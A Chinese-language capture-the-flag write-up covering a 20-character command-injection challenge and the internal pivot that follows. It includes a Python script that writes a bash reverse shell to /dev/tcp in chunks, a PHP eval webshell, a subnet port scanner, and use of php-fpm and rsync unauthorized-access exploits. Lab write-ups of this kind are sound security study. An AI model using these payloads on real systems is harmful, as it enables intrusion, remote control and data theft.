0x01 前言
前一个入群题,web方面的,也就是那个wordpress,我是一点想法都没有,不过这次的题想法倒是很清晰,侥幸做出来了,想了下,一年下来没有白学,虽然是还是很菜,但是至少有了动力。
0x02 题目描述
0x03 payload 构造
一看题目,这不是hitcon2017的题吗,当时那两道题限制的是4位和5位的长度,这道题限制的是20位的长度,就更简单了,我们可以利用"echo \c"与重定向符号"> >>"将代码写入文件,只需要简单构造一下payload就行:
# written by python3.5
# -*- coding:utf-8 -*-
import requests
import urllib.parse
url = "https://473831530.trains.virzz.com/index.php"
payload = "bash -i >& /dev/tcp/yourIp/yourPort 0>&1"
#payload = "<?php @eval($_POST[1]);?>"
req = requests.get(url + "?reset=1")
x = [i for i in range(len(payload)) if i % 3 == 0]
pay = [payload[i:i + 3] for i in x]
for i in pay:
p = "echo '" + i + "\\c" + "' >>1"
print(p)
assert len(p) <= 20
requests.get(url + "?cmd={}".format(urllib.parse.quote(p)))
requests.get(url + "?cmd=bash 1")
即可成功反弹shell,同时将第9行注释去掉,并将第15行文件名改为1.php,就可以成功写入一句话木马,通过小码传一个大码上去(ps:大马可在http://webshell8.com/ 找到)
看起来是上传成功了,我们访问一下试试:
上传成功,结合提示python3以及flag不在此serve,第一时间想到需要内网渗透,但是tmd ifconfig等查ip的命令都被禁用了,这里可用cat /etc/hosts 查看,而同行学弟就直接包含phpinfo页面也可成功拿到本机ip
上传一个ip&port扫描的脚本:
#!/usr/bin/env python3
import telnetlib
import threading
import queue
import sys
def get_ip_status(ip):
server = telnetlib.Telnet()
for port in [21, 22, 23, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 443, 873, 1433, 3306, 3389, 5432, 6082, 6379, 7001, 7002, 8000, 9000,9090, 8080, 8081, 8089, 9090, 27017, 27018]:
try:
server.open(ip, port)
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
#print('{0} port {1} is not open'.format(ip, port))
pass
finally:
server.close()
def check_open(q):
try:
while True:
ip = q.get_nowait()
get_ip_status(ip)
except queue.Empty as e:
pass
if __name__ == '__main__':
host = []
ip = sys.argv[1:]
ip = "".join(ip)
args = ".".join(ip.split(".")[:-1])
for i in range(1, 256):
host.append("{off1}.{off2}".format(off1=args, off2=i))
q = queue.Queue()
for ip in host:
q.put(ip)
threads = []
for i in range(10):
t = threading.Thread(target=check_open, args=(q,))
t.start()
threads.append(t)
for t in threads:
t.join()
可以在结果发现,172.16.233.111开放了80,873,9000端口,继续写脚本:
#!/usr/bin/python3
import urllib.request
import time
HEADERS = {'user-agent': ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5)'
'AppleWebKit/537.36 (KHTML, like Gecko)'
'Chrome/45.0.2454.101 Safari/537.36'),
'referer': 'http://172.16.233.111/index.html',
'X-Forwared-For': '127.0.0.1'
}
file = urllib.request.Request("http://172.16.233.111:80/", headers=HEADERS)
data = urllib.request.urlopen(file)
print(data.headers)
print(data.read().decode('utf-8'))
发现redirect.php,修改脚本尝试访问redirec.php,却是:连接失败
网上搜索873端口和9000端口,发现873存在rsync未授权访问和9000存在php-fpm未授权执行任意命令,尝试rsync,但在222这台是禁用了这个命令的,
继续搜9000端口,在Phithon牛一篇文章(https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html)发现存在exp利用脚本,上传后,运行在根目录下发现flag文件:
但是我们不是root权限,只是一个普通的nobody权限,查看不了flag,这时又被卡住了,想着去提权试试,但是想了下有点不可行,你能到root权限那还得了,又想到873的未授权访问还没利用呢,迅速查一下rsync的配置文件:
这可恶啊,限制了本地,我去,是说怎么执行不了rsync命令,最后请教了一下学长,学长说:“既然都能任意命令执行了,为什么不反弹个shell呢?”,wc我还真是个弟中弟,做题做傻了,直接/tmp shell反弹(还是参考phithon牛https://www.leavesongs.com/PHP/backshell-via-php.html):
成功反弹shell,我们继续执行rsync命令即可得到flag:
Comments NOTHING